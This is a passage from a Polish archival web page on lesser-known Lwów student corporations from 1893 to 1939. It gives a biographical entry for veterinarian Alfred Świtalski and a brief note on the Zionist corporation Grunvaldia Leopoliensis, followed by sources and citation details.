 4. Alfred Świtalski, (12 maja 1915 w Przemyślu - 17 maja 1990 w Lublińcu) s. Antoniego (zawodowy wojskowy) i Olgi z d. Foltyn, absolwent Gimnazjum im. Juliusza Słowackiego w Przemyślu, student AMW, kanclerz Zawiszy Czarnego, po wojnie do 1953 żołnierz służby czynnej, kpt LWP, studia wet. ukończył po wojnie na Wydziale Medycyny Weterynaryjnej UWr. i PWr. we Wrocławiu, lekarz wet. w Przemyślu i Sanoku, od 1953 kierownik lecznicy wet. w miejsc. Dobrodzienia w pow.lublinieckim, od 1970 powiatowy lekarz wet. w Lublińcu, radny Miejskiej Rady Narodowej w Dobrodzieniu, pochowany na cmentarzu komunalnym w Lublińcu

XXVI. Grunvaldia Leopoliensis

Data powstania: lata 30-te
Barwy: ?
Dewiza: ?

Grunvaldia powstała w latach 30-tych. Należała do korporacji syjonistycznych.

Listy członków opracowano na podstawie:

1) materiałów archiwalnych z Archiwum Korporacyjnego,
2) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków korporacji.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 2 X 2010 r.
Ostania zmiana: 24 XII 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Mniejsze i mniej znane korporacje akademickie ze Lwowa 1893-1939, (na:) www.archiwumkorporacyjne.pl, stan 24 XII 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }